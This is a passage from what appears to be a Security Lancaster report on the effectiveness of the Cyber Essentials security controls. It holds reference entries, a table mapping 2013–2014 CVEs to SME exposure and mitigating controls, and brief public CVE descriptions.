[10] HM Government. Cyber essentials certified companies. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400914/bis-15-72-cyber-essentials-scheme-assurance-framework.pdf, January 2015.

[11] Lenovo. Superfish uninstall instructions. http://support.lenovo.com/us/en/product_security/superfish_uninstall.

[12] Mitre.org. CVE-2014-0160 aka Heartbleed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160, 2014.

[13] Mitre.org. CVE-2014-6271 aka Shellshock. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271, 2014.

[14] Mitre.org. CVE-2015-2077 aka Superfish. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2077, 2015.

[15] Netcraft. Half a million widely trusted websites vulnerable to Heartbleed bug. http://news.netcraft.com/archives/2014/04/08/half-a-million-widely-trusted-websites-vulnerable-to-heartbleed-bug.html, April 2014.

[16] Cabinet Office. The UK cyber security strategy - protecting and promoting the UK in a digital world. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/60961/uk-cyber-security-strategy-final.pdf, November 2011.

[17] Cabinet Office and The Rt Hon Francis Maude MP. Government mandates new cyber security standard for suppliers. https://www.gov.uk/government/news/government-mandates-new-cyber-security-standard-for-suppliers, September 2014.


Cyber Controls Applicability

| CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE | Applicable controls |
|---|---|---|---|---|---|---|---|---|
| CVE-2013-0008 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration (User Policy), Anti-Malware |
| CVE-2013-0022 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-0084 | y | y | y | n | y | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-0140 | y | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-0149 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management |
| CVE-2013-0172 | y | n | n | n | n | Not Mitigated | Mitigated | User Access (Strong Password), Patch Management |
| CVE-2013-0174 | n | n | n | n | n | Not Mitigated | Mitigated | Access Policy (Strong Password), Firewall, Patch Management |
| CVE-2013-0199 | y | n | n | n | n | Not Mitigated | Mitigated | Patch Management & Secure Configuration |
| CVE-2013-0253 | n | n | y | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Server) |
| CVE-2013-0270 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-0481 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-0598 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-0619 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-0633 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration (Secure Browsing), Firmware Management |
| CVE-2013-0649 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration (Secure Browsing), Patch Management |
| CVE-2013-0746 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-0753 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-0787 | y | y | y | y | n | Not Mitigated | Mitigated | Patch Management |
| CVE-2013-0909 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-1035 | y | y | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-1102 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management |
| CVE-2013-1140 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install) |
| CVE-2013-1144 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management & Firewall |
| CVE-2013-1153 | y | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration |
| CVE-2013-1181 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management |
| CVE-2013-1303 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-1384 | y | y | y | y | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration (Secure Browser) |
| CVE-2013-1388 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration |
| CVE-2013-1450 | y | n | y | y | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management |
| CVE-2013-1472 | y | y | y | y | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration (Access Policy) |
| CVE-2013-1553 | y | n | y | y | n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-1620 | y | y | y | y | n | Not Mitigated | Partially Mitigated | Patch Management & Firewall |
| CVE-2013-1627 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-1638 | y | y | y | y | n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-1669 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-1676 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-1700 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management, Anti-Malware |
| CVE-2013-1734 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-1777 | n | n | y | n | n | Not Mitigated | Mitigated | Firewall, Patch Management |
| CVE-2013-2319 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Firewall, Secure Configuration (Secure Browser) |
| CVE-2013-2340 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install) |
| CVE-2013-2350 | n | y | n | n | y | Not Mitigated | Partially Mitigated | Patch Management & Firewall |
| CVE-2013-2492 | y | n | y | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management |
| CVE-2013-2507 | y | n | n | n | n | Not Mitigated | Partially Mitigated | Firmware Management, Anti-Malware |
| CVE-2013-2736 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-2780 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management |
| CVE-2013-2803 | n | n | n | n | n | Not Mitigated | Mitigated | Strong Passwords, Patch Management |
| CVE-2013-2824 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management |
| CVE-2013-2826 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management |
| CVE-2013-2920 | n | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-3064 | y | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-3116 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-3137 | y | y | y | y | n | Not Mitigated | Mitigated | Anti-Malware, Secure Configuration (Don't install) |
| CVE-2013-3194 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-3199 | y | n | y | y | y | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-3201 | y | n | y | y | y | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-3206 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-3280 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management & Secure Configuration |
| CVE-2013-3387 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management |
| CVE-2013-3417 | n | n | n | n | n | Not Mitigated | Mitigated | Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-3632 | y | y | y | n | n | Not Mitigated | Mitigated | Access Policy (Strong Password), Firewall |
| CVE-2013-3656 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-3856 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Firewall, Anti-Malware |
| CVE-2013-3860 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-3893 | y | n | y | y | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (no JS) |
| CVE-2013-3897 | y | n | y | y | n | Not Mitigated | Mitigated | Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-3900 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management |
| CVE-2013-3905 | y | y | n | y | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install) |
| CVE-2013-4223 | y | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install) |
| CVE-2013-4436 | n | n | n | n | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management |
| CVE-2013-4478 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration |
| CVE-2013-4529 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-4555 | y | n | y | y | n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-4776 | y | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Patch Management |
| CVE-2013-4782 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install) |
| CVE-2013-5057 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-5369 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management & Secure Configuration |
| CVE-2013-5428 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-5431 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-5494 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration |
| CVE-2013-5507 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Patch Management |
| CVE-2013-5536 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Patch Management |
| CVE-2013-5559 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-5561 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration |
| CVE-2013-5751 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management & Secure Configuration |
| CVE-2013-5757 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall |
| CVE-2013-5828 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-6167 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Access Control, Secure Configuration (Cookie deletion) |
| CVE-2013-6188 | y | y | n | n | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-6284 | n | n | n | n | n | Not Mitigated | Not Mitigated | Secure Configuration (Don't install) |
| CVE-2013-6396 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Server) |
| CVE-2013-6475 | n | y | y | n | n | Not Mitigated | Mitigated | Anti-Malware, Firewall, Patch Management |
| CVE-2013-6660 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2013-6699 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Secure Configuration |
| CVE-2013-6702 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Patch Management |
| CVE-2013-6979 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2013-6994 | n | n | y | n | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management |
| CVE-2013-7004 | y | n | n | y | n | Not Mitigated | Mitigated | Firewall, Secure Configuration, Firmware Management |
| CVE-2013-7043 | n | n | n | y | n | Not Mitigated | Partially Mitigated | Firmware Management |
| CVE-2013-7389 | y | n | n | y | y | Not Mitigated | Mitigated | Firewall, Secure Configuration, Firmware Management |
| CVE-2014-0001 | y | n | y | n | n | Not Mitigated | Mitigated | Boundary Firewalls (include anti-DoS) |
| CVE-2014-0035 | n | n | y | n | n | Not Mitigated | Mitigated | Patch Management & SSL |
| CVE-2014-0160 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2014-0207 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management & SSL |
| CVE-2014-0232 | y | y | y | n | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management |
| CVE-2014-0259 | y | y | y | y | y | Not Mitigated | Mitigated | Malware Protection & Patch Management |
| CVE-2014-0266 | y | y | y | n | y | Not Mitigated | Partially Mitigated | Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2014-0294 | n | n | y | n | y | Not Mitigated | Mitigated | Secure Configuration, Anti-Malware |
| CVE-2014-0313 | y | n | y | y | n | Not Mitigated | Partially Mitigated | Secure Configuration (Secure Browser), Website Blacklisting |
| CVE-2014-0354 | y | n | n | y | n | Not Mitigated | Mitigated | Secure Configuration, Firmware Management |
| CVE-2014-0362 | y | y | y | y | n | Not Mitigated | Mitigated | Patch Management & Secure Configuration (Secure Browser & Web Hosting) |
| CVE-2014-0433 | y | y | y | n | y | Not Mitigated | Mitigated | Patch Management |
| CVE-2014-0488 | y | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management, Anti-Malware |
| CVE-2014-0493 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2014-0494 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2014-0498 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2014-0515 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2014-0533 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Access Control |
| CVE-2014-0536 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Access Control |
| CVE-2014-0562 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2014-0577 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Access Control |
| CVE-2014-0765 | n | n | n | n | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management |
| CVE-2014-0767 | n | n | n | n | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management |
| CVE-2014-0783 | n | n | n | n | n | Not Mitigated | Mitigated | Patch Management, Secure Configuration (Port closing) |
| CVE-2014-1330 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Firewall, Website Blacklisting |
| CVE-2014-1342 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Firewall, Website Blacklisting |
| CVE-2014-1349 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Firewall, Access Control |
| CVE-2014-1356 | y | y | y | y | y | Not Mitigated | Mitigated | Secure Configuration, Malware Protection, Patch Management |
| CVE-2014-1370 | y | y | y | y | y | Not Mitigated | Mitigated | Malware Protection, Patch Management |
| CVE-2014-1379 | y | y | y | y | y | Not Mitigated | Mitigated | Malware Protection, Patch Management |
| CVE-2014-1379 | n | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Anti-Malware |
| CVE-2014-1382 | y | y | y | y | y | Not Mitigated | Mitigated | Website Blacklist, Patch Management |
| CVE-2014-1466 | y | n | n | n | y | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2014-1472 | y | n | n | n | n | Not Mitigated | Mitigated | Website Blacklist, Patch Management |
| CVE-2014-1477 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management |
| CVE-2014-1518 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management |
| CVE-2014-1563 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management |
| CVE-2014-1565 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management |
| CVE-2014-1586 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management |
| CVE-2014-1701 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2014-1740 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management |
| CVE-2014-1744 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management |
| CVE-2014-1753 | y | n | y | y | y | Not Mitigated | Mitigated | Website Blacklisting & Patch Management |
| CVE-2014-1806 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management |
| CVE-2014-1808 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall, Website Blacklisting & Patch Management |
| CVE-2014-1811 | y | y | y | y | y | Not Mitigated | Mitigated | Firewall |
| CVE-2014-1812 | y | y | y | y | y | Not Mitigated | Mitigated | Strong Passwords (User Access) |
| CVE-2014-2014 | n | n | n | n | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management |
| CVE-2014-2103 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Anti-DoS |
| CVE-2014-2109 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall & Patch Management |
| CVE-2014-2364 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2014-2416 | n | y | y | n | n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2014-2554 | n | n | y | n | n | Not Mitigated | Mitigated | Patch Management, Access Control, Website Blacklisting |
| CVE-2014-2643 | n | y | n | n | n | Not Mitigated | Mitigated | Patch Management, Strong Passwords (User Access) |
| CVE-2014-2742 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Anti-DoS |
| CVE-2014-2768 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-2789 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-2791 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-2794 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-2808 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-2821 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-3444 | n | n | n | y | n | Not Mitigated | Mitigated | Anti-Malware, Patch Management |
| CVE-2014-3489 | n | n | n | n | n | Not Mitigated | Mitigated | Strong Passwords (User Access) |
| CVE-2014-3507 | n | n | y | y | y | Not Mitigated | Mitigated | Firewall & Patch Management |
| CVE-2014-3556 | y | n | y | n | y | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2014-3580 | y | y | y | n | n | Not Mitigated | Mitigated | Firewall, Anti-DoS, Patch Management |
| CVE-2014-3814 | n | n | n | n | n | Not Mitigated | Mitigated | Strong Passwords (User Access) |
| CVE-2014-3819 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Anti-DoS, Firmware Updates |
| CVE-2014-3872 | n | n | n | n | n | Not Mitigated | Mitigated | Secure Configuration & Patch Management |
| CVE-2014-4044 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2014-4079 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4082 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4100 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4105 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4114 | y | y | y | y | n | Not Mitigated | Mitigated | Anti-Malware |
| CVE-2014-4127 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4130 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4132 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4133 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4141 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-4481 | y | y | y | y | y | Not Mitigated | Mitigated | Patch Management, Anti-Malware |
| CVE-2014-4617 | y | y | n | n | n | Not Mitigated | Mitigated | Firewall, Patch Management |
| CVE-2014-4631 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management, Secure Configuration |
| CVE-2014-6040 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2014-6105 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Patch Management |
| CVE-2014-6136 | n | n | n | n | n | Not Mitigated | Mitigated | Secure Configuration, Patch Management |
| CVE-2014-6363 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-6369 | y | n | y | y | n | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-6378 | n | n | n | n | n | Not Mitigated | Mitigated | Firewall, Patch Management |
| CVE-2014-6487 | n | n | y | n | n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2014-7250 | n | y | y | n | n | Not Mitigated | Mitigated | Firewall, Patch Management |
| CVE-2014-7927 | y | y | y | y | n | Not Mitigated | Mitigated | Firewall, Secure Configuration (Access Control), Patch Management |
| CVE-2014-7945 | y | y | y | y | n | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2014-8447 | y | y | y | y | n | Not Mitigated | Partially Mitigated | Anti-Malware, Patch Management |
| CVE-2014-8638 | y | y | y | y | y | Not Mitigated | Mitigated | Website Blacklisting, Secure Configuration (Secure Browser), Patch Management |
| CVE-2014-8835 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Patch Management |
| CVE-2014-9159 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Anti-Malware, Patch Management [Time Delay] |
| CVE-2014-9163 | y | y | y | y | y | Not Mitigated | Partially Mitigated | Anti-Malware, Patch Management [Time Delay] |
| CVE-2014-9350 | y | y | y | y | n | Not Mitigated | Mitigated | Firewall, Anti-DoS, Firmware Updates |
| CVE-2014-9357 | n | n | n | n | n | Not Mitigated | Partially Mitigated | Patch Management, Anti-Malware, Secure Configuration |

CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 18 of 28

CVE Details

CVE-2013-0008: win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability".

CVE-2013-0022: Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer LsGetTrailInfo Use After Free Vulnerability".

CVE-2013-0084: Directory traversal vulnerability in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to bypass intended read restrictions for content, and hijack user accounts, via a crafted URL, aka "SharePoint Directory Traversal Vulnerability".

CVE-2013-0140: SQL injection vulnerability in the Agent-Handler component in McAfee ePolicy Orchestrator (ePO) before 4.5.7 and 4.6.x before 4.6.6 allows remote attackers to execute arbitrary SQL commands via a crafted request over the Agent-Server communication channel.

CVE-2013-0149: The OSPF implementation in Cisco IOS 12.0 through 12.4 and 15.0 through 15.3, IOS-XE 2.x through 3.9.xS, ASA and PIX 7.x through 9.1, FWSM, NX-OS, and StarOS before 14.0.50488 does not properly validate Link State Advertisement (LSA) type 1 packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a (1) unicast or (2) multicast packet, aka Bug IDs CSCug34485, CSCug34469, CSCug39762, CSCug63304, and CSCug39795.

CVE-2013-0172: Samba 4.0.x before 4.0.1, in certain Active Directory domain-controller configurations, does not properly interpret Access Control Entries that are based on an objectClass, which allows remote authenticated users to bypass intended restrictions on modifying LDAP directory objects by leveraging (1) objectClass access by a user, (2) objectClass access by a group, or (3) write access to an attribute.

CVE-2013-0174: The external node classifier (ENC) API in Foreman before 1.1 allows remote attackers to obtain the hashed root password via an API request.

CVE-2013-0199: The default LDAP ACIs in FreeIPA 3.0 before 3.1.2 do not restrict access to the (1) ipaNTTrustAuthIncoming and (2) ipaNTTrustAuthOutgoing attributes, which allow remote attackers to obtain the Cross-Realm Kerberos Trust key via unspecified vectors.

CVE-2013-0253: The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.

CVE-2013-0270: OpenStack Keystone Grizzly before 2013.1, Folsom, and possibly earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via a large HTTP request, as demonstrated by a long tenant name when requesting a token.

CVE-2013-0481: The console in IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 and 2.2 allows remote attackers to read stack traces by triggering (1) an error or (2) an exception.

CVE-2013-0598: Cross-site request forgery (CSRF) vulnerability in the Web Client in IBM Rational ClearQuest 7.1 before 7.1.2.12, 8.0 before 8.0.0.8, and 8.0.1 before 8.0.1.1 allows remote attackers to hijack the authentication of arbitrary users.

CVE-2013-0619: Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11.x before 11.0.1 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-1530, CVE-2013-0601, CVE-2013-0605, CVE-2013-0616, CVE-2013-0620, and CVE-2013-0623.

CVE-2013-0633: Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013.

CVE-2013-0649: Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0644 and CVE-2013-1374.

CVE-2013-0746: Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 do not properly implement quickstubs that use the jsval data type for their return values, which allows remote attackers to execute arbitrary code or cause a denial of service (compartment mismatch and application crash) via crafted JavaScript code that is not properly handled during garbage collection.

CVE-2013-0753: Use-after-free vulnerability in the serializeToStream implementation in the XMLSerializer component in Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x before 17.0.2, Thunderbird before 17.0.2, Thunderbird ESR 10.x before 10.0.12 and 17.x before 17.0.2, and SeaMonkey before 2.15 allows remote attackers to execute arbitrary code via crafted web content.

CVE-2013-0787: Use-after-free vulnerability in the nsEditor::IsPreformatted function in editor/libeditor/base/nsEditor.cpp in Mozilla Firefox before 19.0.2, Firefox ESR 17.x before 17.0.4, Thunderbird before 17.0.4, Thunderbird ESR 17.x before 17.0.4, and SeaMonkey before 2.16.1 allows remote attackers to execute arbitrary code via vectors involving an execCommand call.

CVE-2013-0909: The XSS Auditor in Google Chrome before 25.0.1364.152 allows remote attackers to obtain sensitive HTTP Referer information via unspecified vectors.

CVE-2013-1035: The iTunes ActiveX control in Apple iTunes before 11.1 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.

CVE-2013-1102: The Wireless Intrusion Prevention System (wIPS) component on Cisco Wireless LAN Controller (WLC) devices with software 7.0 before 7.0.235.0, 7.1 and 7.2 before 7.2.110.0, and 7.3 before 7.3.101.0 allows remote attackers to cause a denial of service (device reload) via crafted IP packets, aka Bug ID CSCtx80743.

CVE-2013-1140: The XML parser in Cisco Security Monitoring, Analysis, and Response System (MARS) allows remote attackers to read arbitrary files via an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, aka Bug ID CSCue55093.

CVE-2013-1144: Memory leak in the IKEv1 implementation in Cisco IOS 15.1 allows remote attackers to cause a denial of service (memory consumption) via unspecified (1) IPv4 or (2) IPv6 IKE packets, aka Bug ID CSCth81055.

CVE-2013-1153: Cross-site request forgery (CSRF) vulnerability in the web interface in Cisco Prime Infrastructure allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCue84676.

